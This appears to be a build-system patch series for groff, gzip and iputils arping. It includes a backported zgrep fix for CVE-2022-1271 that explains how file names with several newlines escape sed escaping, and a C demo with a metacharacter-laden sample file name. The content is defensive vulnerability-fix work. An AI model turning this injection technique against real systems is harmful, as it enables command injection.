- { (yyval.pb) = new pile_box((yyvsp[0].b)); }
--#line 1820 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1835 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 58:
--#line 272 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 276 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[-2].pb)->append((yyvsp[0].b)); (yyval.pb) = (yyvsp[-2].pb); }
--#line 1826 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1841 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 59:
--#line 277 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 281 "src/preproc/eqn/eqn.ypp"
- { (yyval.pb) = (yyvsp[-1].pb); }
--#line 1832 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1847 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 60:
--#line 279 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 283 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[-1].pb)->set_space((yyvsp[-3].n)); (yyval.pb) = (yyvsp[-1].pb); }
--#line 1838 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1853 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 61:
--#line 284 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 288 "src/preproc/eqn/eqn.ypp"
- { (yyval.mb) = new matrix_box((yyvsp[0].col)); }
--#line 1844 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1859 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 62:
--#line 286 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 290 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[-1].mb)->append((yyvsp[0].col)); (yyval.mb) = (yyvsp[-1].mb); }
--#line 1850 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1865 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 63:
--#line 291 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 295 "src/preproc/eqn/eqn.ypp"
- { (yyval.col) = new column((yyvsp[0].b)); }
--#line 1856 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1871 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 64:
--#line 293 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 297 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[-2].col)->append((yyvsp[0].b)); (yyval.col) = (yyvsp[-2].col); }
--#line 1862 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1877 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 65:
--#line 298 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 302 "src/preproc/eqn/eqn.ypp"
- { (yyval.col) = (yyvsp[-1].col); }
--#line 1868 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1883 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 66:
--#line 300 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 304 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[-1].col)->set_space((yyvsp[-3].n)); (yyval.col) = (yyvsp[-1].col); }
--#line 1874 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1889 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 67:
--#line 305 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 309 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].col)->set_alignment(CENTER_ALIGN); (yyval.col) = (yyvsp[0].col); }
--#line 1880 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1895 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 68:
--#line 307 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 311 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].col)->set_alignment(LEFT_ALIGN); (yyval.col) = (yyvsp[0].col); }
--#line 1886 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1901 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 69:
--#line 309 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 313 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].col)->set_alignment(RIGHT_ALIGN); (yyval.col) = (yyvsp[0].col); }
--#line 1892 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1907 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 70:
--#line 311 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 315 "src/preproc/eqn/eqn.ypp"
- { (yyvsp[0].col)->set_alignment(CENTER_ALIGN); (yyval.col) = (yyvsp[0].col); }
--#line 1898 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1913 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 71:
--#line 315 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 319 "src/preproc/eqn/eqn.ypp"
- { (yyval.str) = (yyvsp[0].str); }
--#line 1904 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1919 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 72:
--#line 317 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 321 "src/preproc/eqn/eqn.ypp"
- { (yyval.str) = (yyvsp[0].str); }
--#line 1910 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1925 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 73:
--#line 322 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 326 "src/preproc/eqn/eqn.ypp"
- { (yyval.str) = (yyvsp[0].str); }
--#line 1916 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1931 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 74:
--#line 324 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 328 "src/preproc/eqn/eqn.ypp"
- { (yyval.str) = strsave("{"); }
--#line 1922 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1937 "src/preproc/eqn/eqn.cpp"
- break;
-
- case 75:
--#line 326 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1645 */
-+#line 330 "src/preproc/eqn/eqn.ypp"
- { (yyval.str) = strsave("}"); }
--#line 1928 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1943 "src/preproc/eqn/eqn.cpp"
- break;
-
-
--#line 1932 "src/preproc/eqn/eqn.cpp" /* yacc.c:1645 */
-+#line 1947 "src/preproc/eqn/eqn.cpp"
-+
- default: break;
- }
- /* User semantic actions sometimes alter yychar, and that requires
-@@ -2042,12 +2058,10 @@ yyerrlab:
- | yyerrorlab -- error raised explicitly by YYERROR. |
- `---------------------------------------------------*/
- yyerrorlab:
--
-- /* Pacify compilers like GCC when the user code never invokes
-- YYERROR and the label yyerrorlab therefore never appears in user
-- code. */
-- if (/*CONSTCOND*/ 0)
-- goto yyerrorlab;
-+ /* Pacify compilers when the user code never invokes YYERROR and the
-+ label yyerrorlab therefore never appears in user code. */
-+ if (0)
-+ YYERROR;
-
- /* Do not reclaim the symbols of the rule whose action triggered
- this YYERROR. */
-@@ -2109,6 +2123,7 @@ yyacceptlab:
- yyresult = 0;
- goto yyreturn;
-
-+
- /*-----------------------------------.
- | yyabortlab -- YYABORT comes here. |
- `-----------------------------------*/
-@@ -2116,6 +2131,7 @@ yyabortlab:
- yyresult = 1;
- goto yyreturn;
-
-+
- #if !defined yyoverflow || YYERROR_VERBOSE
- /*-------------------------------------------------.
- | yyexhaustedlab -- memory exhaustion comes here. |
-@@ -2126,6 +2142,10 @@ yyexhaustedlab:
- /* Fall through. */
- #endif
-
-+
-+/*-----------------------------------------------------.
-+| yyreturn -- parsing is finished, return the result. |
-+`-----------------------------------------------------*/
- yyreturn:
- if (yychar != YYEMPTY)
- {
-@@ -2155,5 +2175,5 @@ yyreturn:
- #endif
- return yyresult;
- }
--#line 329 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1903 */
-+#line 333 "src/preproc/eqn/eqn.ypp"
-
-diff --git a/src/preproc/eqn/eqn.hpp b/src/preproc/eqn/eqn.hpp
-index 32a32a5..9a092c1 100644
---- a/src/preproc/eqn/eqn.hpp
-+++ b/src/preproc/eqn/eqn.hpp
-@@ -1,8 +1,9 @@
--/* A Bison parser, made by GNU Bison 3.2. */
-+/* A Bison parser, made by GNU Bison 3.4.1. */
-
- /* Bison interface for Yacc-like parsers in C
-
-- Copyright (C) 1984, 1989-1990, 2000-2015, 2018 Free Software Foundation, Inc.
-+ Copyright (C) 1984, 1989-1990, 2000-2015, 2018-2019 Free Software Foundation,
-+ Inc.
-
- This program is free software: you can redistribute it and/or modify
- it under the terms of the GNU General Public License as published by
-@@ -170,10 +171,9 @@ extern int yydebug;
-
- /* Value type. */
- #if ! defined YYSTYPE && ! defined YYSTYPE_IS_DECLARED
--
- union YYSTYPE
- {
--#line 30 "../src/preproc/eqn/eqn.ypp" /* yacc.c:1906 */
-+#line 34 "src/preproc/eqn/eqn.ypp"
-
- char *str;
- box *b;
-@@ -182,9 +182,9 @@ union YYSTYPE
- int n;
- column *col;
-
--#line 186 "src/preproc/eqn/eqn.hpp" /* yacc.c:1906 */
--};
-+#line 186 "src/preproc/eqn/eqn.hpp"
-
-+};
- typedef union YYSTYPE YYSTYPE;
- # define YYSTYPE_IS_TRIVIAL 1
- # define YYSTYPE_IS_DECLARED 1
diff --git a/src/preproc/eqn/eqn.ypp b/src/preproc/eqn/eqn.ypp
index fb318c3..b7b647e 100644
--- a/src/preproc/eqn/eqn.ypp
diff --git a/meta/recipes-extended/groff/groff_1.22.4.bb b/meta/recipes-extended/groff/groff_1.22.4.bb
index e398478349..f0e9eb6a8a 100644
--- a/meta/recipes-extended/groff/groff_1.22.4.bb
+++ b/meta/recipes-extended/groff/groff_1.22.4.bb
@@ -18,6 +18,9 @@ SRC_URI = "${GNU_MIRROR}/groff/groff-${PV}.tar.gz \
SRC_URI[md5sum] = "08fb04335e2f5e73f23ea4c3adbf0c5f"
SRC_URI[sha256sum] = "e78e7b4cb7dec310849004fa88847c44701e8d133b5d4c13057d876c1bad0293"
+# Remove at the next upgrade
+PR = "r1"
+
DEPENDS = "bison-native"
RDEPENDS_${PN} += "perl sed"
@@ -28,7 +31,14 @@ MULTILIB_SCRIPTS = "${PN}:${bindir}/gpinyin ${PN}:${bindir}/groffer ${PN}:${bind
EXTRA_OECONF = "--without-x --without-doc"
PARALLEL_MAKE = ""
-CACHED_CONFIGUREVARS += "ac_cv_path_PERL='/usr/bin/env perl' ac_cv_path_BASH_PROG='no'"
+CACHED_CONFIGUREVARS += "ac_cv_path_PERL='/usr/bin/env perl' ac_cv_path_BASH_PROG='no' PAGE=A4"
+
+# Delete these generated files since we depend on bison-native
+# and regenerate them; do it unconditionally so the build is deterministic.
+do_configure_prepend() {
+ rm -f ${S}/src/preproc/eqn/eqn.cpp
+ rm -f ${S}/src/preproc/eqn/eqn.hpp
+}
do_install_append() {
# Some distros have both /bin/perl and /usr/bin/perl, but we set perl location
@@ -52,6 +62,10 @@ do_install_append() {
rm -rf ${D}${bindir}/glilypond
rm -rf ${D}${libdir}/groff/glilypond
rm -rf ${D}${mandir}/man1/glilypond*
+
+	# do not ship /usr/bin/grap2graph and its related man files
+ rm -rf ${D}${bindir}/grap2graph
+ rm -rf ${D}${mandir}/man1/grap2graph*
}
do_install_append_class-native() {
diff --git a/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch b/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch
new file mode 100644
index 0000000000..046c95df47
--- /dev/null
+++ b/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch
@@ -0,0 +1,45 @@
+From 7073a366ee71639a1902eefb7500e14acb920f64 Mon Sep 17 00:00:00 2001
+From: Lasse Collin <lasse.collin@tukaani.org>
+Date: Mon, 4 Apr 2022 23:52:49 -0700
+Subject: [PATCH] zgrep: avoid exploit via multi-newline file names
+
+* zgrep.in: The issue with the old code is that with multiple
+newlines, the N-command will read the second line of input,
+then the s-commands will be skipped because it's not the end
+of the file yet, then a new sed cycle starts and the pattern
+space is printed and emptied. So only the last line or two get
+escaped. This patch makes sed read all lines into the pattern
+space and then do the escaping.
+
+This vulnerability was discovered by:
+cleemy desu wayo working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/gzip.git/commit/?id=dc9740df61e575e8c3148b7bd3c147a81ea00c7c]
+CVE: CVE-2022-1271
+
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+---
+ zgrep.in | 10 +++++++---
+ 1 file changed, 7 insertions(+), 3 deletions(-)
+
+diff --git a/zgrep.in b/zgrep.in
+index 3efdb52..d391291 100644
+--- a/zgrep.in
++++ b/zgrep.in
+@@ -222,9 +222,13 @@ do
+ '* | *'&'* | *'\'* | *'|'*)
+ i=$(printf '%s\n' "$i" |
+ sed '
+- $!N
+- $s/[&\|]/\\&/g
+- $s/\n/\\n/g
++ :start
++ $!{
++ N
++ b start
++ }
++ s/[&\|]/\\&/g
++ s/\n/\\n/g
+ ');;
+ esac
+ sed_script="s|^|$i:|"
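
The requirement behind the fix is that every '&', '\', '|' and newline in a file
name must be escaped before the name is spliced into the sed "s|^|$i:|"
expression, not just the characters on the file name's last line. zgrep does this
with the sed loop above; purely as an illustration of the same escaping goal, a
hypothetical C helper could look like this:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    /* Escape '&', '\', '|' and newlines in 'name' so it can be embedded in a
     * sed replacement without being interpreted.  Caller frees the result. */
    static char *escape_for_sed(const char *name)
    {
        size_t n = strlen(name);
        char *out = malloc(2 * n + 1);   /* worst case: every char escaped */
        if (out == NULL)
            return NULL;
        char *p = out;
        for (size_t i = 0; i < n; i++) {
            char c = name[i];
            if (c == '\n')      { *p++ = '\\'; *p++ = 'n'; }
            else if (c == '&' || c == '\\' || c == '|')
                                { *p++ = '\\'; *p++ = c; }
            else                  *p++ = c;
        }
        *p = '\0';
        return out;
    }

    int main(void)
    {
        char *e = escape_for_sed("evil|name\nwith&newline");
        if (e != NULL) {
            printf("%s\n", e);
            free(e);
        }
        return 0;
    }
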
diff --git a/meta/recipes-extended/gzip/gzip_1.10.bb b/meta/recipes-extended/gzip/gzip_1.10.bb
index 9778e687e1..c558c21f10 100644
--- a/meta/recipes-extended/gzip/gzip_1.10.bb
+++ b/meta/recipes-extended/gzip/gzip_1.10.bb
@@ -4,6 +4,7 @@ LICENSE = "GPLv3+"
SRC_URI = "${GNU_MIRROR}/gzip/${BP}.tar.gz \
file://run-ptest \
+ file://CVE-2022-1271.patch \
"
SRC_URI_append_class-target = " file://wrong-path-fix.patch"
diff --git a/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch b/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch
new file mode 100644
index 0000000000..bf86115843
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch
@@ -0,0 +1,79 @@
+From 86ed08936d49e2c81ef49dfbd02aca1c74d0c098 Mon Sep 17 00:00:00 2001
+From: lac-0073 <61903197+lac-0073@users.noreply.github.com>
+Date: Mon, 26 Oct 2020 09:45:42 +0800
+Subject: [PATCH] arping: make update neighbours work again
+
+arping uses inconsistent sender_ip_addr and target_ip_addr values in its
+messages. This causes the client receiving the arp message not to update
+its arp table entries.
+
+The specific behaviour is as follows:
+
+There is a machine 2 with IP 10.20.30.3 configured on eth0:0 that is in the
+same IP subnet as eth0. This IP was originally used on another machine 1,
+and the IP needs to be changed back to machine 1. When using the arping
+command to announce what ethernet address has IP 10.20.30.3, the arp table
+on machine 3 is not updated.
+
+Machine 3 original arp table:
+
+ 10.20.30.3 machine 2 eth0:0 00:00:00:00:00:02
+ 10.20.30.2 machine 2 eth0 00:00:00:00:00:02
+ 10.20.30.1 machine 1 eth0 00:00:00:00:00:01
+
+Create interface eth0:0 on machine 1, and use the arping command to send arp
+packets. Expected outcome on machine 3:
+
+ 10.20.30.3 machine 1 eth0:0 00:00:00:00:00:01
+ 10.20.30.2 machine 2 eth0 00:00:00:00:00:02
+ 10.20.30.1 machine 1 eth0 00:00:00:00:00:01
+
+Actual results on machine 3:
+
+ 10.20.30.3 machine 2 eth0:0 00:00:00:00:00:02
+ 10.20.30.2 machine 2 eth0 00:00:00:00:00:02
+ 10.20.30.1 machine 1 eth0 00:00:00:00:00:01
+
+Fixes: https://github.com/iputils/iputils/issues/298
+Fixes: 68f12fc4a0dbef4ae4c404da24040d22c5a14339
+Signed-off-by: Aichun Li <liaichun@huawei.com>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/86ed08936d49e2c81ef49dfbd02aca1c74d0c098]
+Signed-off-by: Visa Hankala <visa@hankala.org>
+---
+ arping.c | 16 +++++++++-------
+ 1 file changed, 9 insertions(+), 7 deletions(-)
+
+diff --git a/arping.c b/arping.c
+index a002786..53fdbb4 100644
+--- a/arping.c
++++ b/arping.c
+@@ -968,7 +968,7 @@ int main(int argc, char **argv)
+ }
+ memset(&saddr, 0, sizeof(saddr));
+ saddr.sin_family = AF_INET;
+- if (!ctl.unsolicited && (ctl.source || ctl.gsrc.s_addr)) {
++ if (ctl.source || ctl.gsrc.s_addr) {
+ saddr.sin_addr = ctl.gsrc;
+ if (bind(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
+ error(2, errno, "bind");
+@@ -979,12 +979,14 @@ int main(int argc, char **argv)
+ saddr.sin_port = htons(1025);
+ saddr.sin_addr = ctl.gdst;
+
+- if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1)
+- error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)"));
+- if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
+- error(2, errno, "connect");
+- if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1)
+- error(2, errno, "getsockname");
++ if (!ctl.unsolicited) {
++ if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1)
++ error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)"));
++ if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
++ error(2, errno, "connect");
++ if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1)
++ error(2, errno, "getsockname");
++ }
+ ctl.gsrc = saddr.sin_addr;
+ }
+ close(probe_fd);
diff --git a/meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch b/meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch
new file mode 100644
index 0000000000..8495178879
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch
@@ -0,0 +1,39 @@
+From 18f14be80466ddc8fb17a400be82764a779c8dcd Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Wed, 31 Jul 2019 21:28:12 +0100
+Subject: [PATCH] arping: revert partially - fix sent vs received packages
+ return value
+
+Commit 84ca65ca980315c73f929fed8b6f16bbd698c3a0 caused a regression. The
+arping -D needs the return value evaluation that was the earlier default;
+in other cases the new return value should be correct.
+
+Addresses: https://github.com/iputils/iputils/issues/209
+See-also: https://github.com/void-linux/void-packages/issues/13304
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/18f14be80466ddc8fb17a400be82764a779c8dcd]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/arping.c b/arping.c
+index 77c9c56..2c87c15 100644
+--- a/arping.c
++++ b/arping.c
+@@ -792,7 +792,11 @@ static int event_loop(struct run_state *ctl)
+ close(tfd);
+ freeifaddrs(ctl->ifa0);
+ rc |= finish(ctl);
+- rc |= (ctl->sent != ctl->received);
++ if (ctl->dad && ctl->quit_on_reply)
++ /* Duplicate address detection mode return value */
++ rc |= !(ctl->brd_sent != ctl->received);
++ else
++ rc |= (ctl->sent != ctl->received);
+ return rc;
+ }
+
+--
+2.18.4
+
diff --git a/meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch b/meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch
new file mode 100644
index 0000000000..a5f40860dc
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch
@@ -0,0 +1,39 @@
+From 1df5350bdc952b14901fde356b17b78c2bcd4cff Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Wed, 28 Aug 2019 20:05:22 +0100
+Subject: [PATCH] arping: fix -f quit on first reply regression
+
+When arping runs together with -f 'quit on first reply' and -w <timeout>
+'how long to wait for a reply', the command needs to exit if replies are
+not received after the wait period. Notice that the exit status in case of
+lost packets will be 1, signifying failure. A reply results in a 0 exit value.
+
+Addresses: https://bugs.debian.org/935946
+Reported-by: Lucas Nussbaum <lucas@debian.org>
+Addresses: https://github.com/iputils/iputils/issues/211
+Reported-by: Noah Meyerhans <noahm@debian.org>
+Broken-since: 67e070d08dcbec990e1178360f82b3e2ca4f6d5f
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/1df5350bdc952b14901fde356b17b78c2bcd4cff]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/arping.c b/arping.c
+index 2c87c15..30884f6 100644
+--- a/arping.c
++++ b/arping.c
+@@ -764,7 +764,8 @@ static int event_loop(struct run_state *ctl)
+ continue;
+ }
+ total_expires += exp;
+- if (0 < ctl->count && (uint64_t)ctl->count < total_expires) {
++ if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) ||
++ (ctl->quit_on_reply && ctl->timeout < total_expires)) {
+ exit_loop = 1;
+ continue;
+ }
+--
+2.18.4
+
diff --git a/meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch b/meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch
new file mode 100644
index 0000000000..ebd122c157
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch
@@ -0,0 +1,37 @@
+From ec821e572a640bd79aecc3922cb9001f4b6b26f2 Mon Sep 17 00:00:00 2001
+From: Petr Vorel <petr.vorel@gmail.com>
+Date: Sat, 7 Sep 2019 06:07:19 +0200
+Subject: [PATCH] arping: Fix comparison of different signedness warning
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+../arping.c:768:45: warning: comparison of integer expressions of different signedness: ‘int’ and ‘uint64_t’ {aka ‘long unsigned int’} [-Wsign-compare]
+ 768 | (ctl->quit_on_reply && ctl->timeout < total_expires)) {
+
+Fixes: 1df5350 ("arping: fix -f quit on first reply regression")
+Reference: https://github.com/iputils/iputils/pull/212
+Acked-by: Sami Kerola <kerolasa@iki.fi>
+Signed-off-by: Petr Vorel <petr.vorel@gmail.com>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/ec821e572a640bd79aecc3922cb9001f4b6b26f2]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/arping.c b/arping.c
+index 2d05728..88319cd 100644
+--- a/arping.c
++++ b/arping.c
+@@ -765,7 +765,7 @@ static int event_loop(struct run_state *ctl)
+ }
+ total_expires += exp;
+ if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) ||
+- (ctl->quit_on_reply && ctl->timeout < total_expires)) {
++ (ctl->quit_on_reply && ctl->timeout < (long)total_expires)) {
+ exit_loop = 1;
+ continue;
+ }
+--
+2.18.4
+
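
The warning exists because comparing a signed value with a uint64_t converts the
signed operand to unsigned, so a negative (for instance unset) timeout would
compare as an enormous positive number; casting the counter down to long keeps
the comparison signed. That motivation is an assumption here, since the commit
message only cites the warning itself, but the promotion is easy to reproduce:

    #include <stdint.h>
    #include <stdio.h>

    int main(void)
    {
        int      timeout       = -1;   /* e.g. "no timeout configured" */
        uint64_t total_expires = 3;

        /* Mixed compare: 'timeout' is converted to uint64_t, -1 becomes
         * 18446744073709551615, and the test is effectively never true. */
        printf("unsigned compare: %d\n", timeout < total_expires);

        /* The patch's approach: bring the counter down to a signed type. */
        printf("signed compare:   %d\n", timeout < (long)total_expires);
        return 0;
    }
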
diff --git a/meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch b/meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch
new file mode 100644
index 0000000000..923e06e30b
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch
@@ -0,0 +1,45 @@
+From 68f12fc4a0dbef4ae4c404da24040d22c5a14339 Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Sat, 8 Feb 2020 14:12:18 +0000
+Subject: [PATCH] arping: return success when unsolicited ARP mode destination
+ does not answer
+
+The manual page promises that answers are not expected when the -U (or -A)
+option is in use. Either I am looking at this wrong or this has been broken
+since the beginning of git history.
+
+Addresses: https://github.com/iputils/iputils/issues/247
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/68f12fc4a0dbef4ae4c404da24040d22c5a14339]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 6 ++++--
+ 1 file changed, 4 insertions(+), 2 deletions(-)
+
+diff --git a/arping.c b/arping.c
+index 996cf2b..5180ae0 100644
+--- a/arping.c
++++ b/arping.c
+@@ -794,7 +794,9 @@ static int event_loop(struct run_state *ctl)
+ close(tfd);
+ freeifaddrs(ctl->ifa0);
+ rc |= finish(ctl);
+- if (ctl->dad && ctl->quit_on_reply)
++ if (ctl->unsolicited)
++ /* nothing */;
++ else if (ctl->dad && ctl->quit_on_reply)
+ /* Duplicate address detection mode return value */
+ rc |= !(ctl->brd_sent != ctl->received);
+ else
+@@ -943,7 +945,7 @@ int main(int argc, char **argv)
+ }
+ memset(&saddr, 0, sizeof(saddr));
+ saddr.sin_family = AF_INET;
+- if (ctl.source || ctl.gsrc.s_addr) {
++ if (!ctl.unsolicited && (ctl.source || ctl.gsrc.s_addr)) {
+ saddr.sin_addr = ctl.gsrc;
+ if (bind(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
+ error(2, errno, "bind");
+--
+2.18.4
+
diff --git a/meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch b/meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch
new file mode 100644
index 0000000000..3b8a8244da
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch
@@ -0,0 +1,94 @@
+From 60a27c76174c0ae23bdafde2bad4fdd18a44a7ea Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Sat, 7 Mar 2020 22:03:21 +0000
+Subject: [PATCH] arping: use additional timerfd to control when timeout
+ happens
+
+Trying to determine timeout by adding up interval values is pointlessly
+complicating. With separate timer everything just works.
+
+Addresses: https://github.com/iputils/iputils/issues/259
+Fixes: 1df5350bdc952b14901fde356b17b78c2bcd4cff
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/e594ca52afde89746b7d79c875fe9d6aea1850ac]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 29 ++++++++++++++++++++++++++---
+ 1 file changed, 26 insertions(+), 3 deletions(-)
+
+diff --git a/arping.c b/arping.c
+index 61db3a6..7284351 100644
+--- a/arping.c
++++ b/arping.c
+@@ -670,6 +670,7 @@ static int event_loop(struct run_state *ctl)
+ enum {
+ POLLFD_SIGNAL = 0,
+ POLLFD_TIMER,
++ POLLFD_TIMEOUT,
+ POLLFD_SOCKET,
+ POLLFD_COUNT
+ };
+@@ -686,6 +687,13 @@ static int event_loop(struct run_state *ctl)
+ .it_value.tv_sec = ctl->interval,
+ .it_value.tv_nsec = 0
+ };
++ int timeoutfd;
++ struct itimerspec timeoutfd_vals = {
++ .it_interval.tv_sec = ctl->timeout,
++ .it_interval.tv_nsec = 0,
++ .it_value.tv_sec = ctl->timeout,
++ .it_value.tv_nsec = 0
++ };
+ uint64_t exp, total_expires = 1;
+
+ unsigned char packet[4096];
+@@ -709,7 +717,7 @@ static int event_loop(struct run_state *ctl)
+ pfds[POLLFD_SIGNAL].fd = sfd;
+ pfds[POLLFD_SIGNAL].events = POLLIN | POLLERR | POLLHUP;
+
+- /* timerfd */
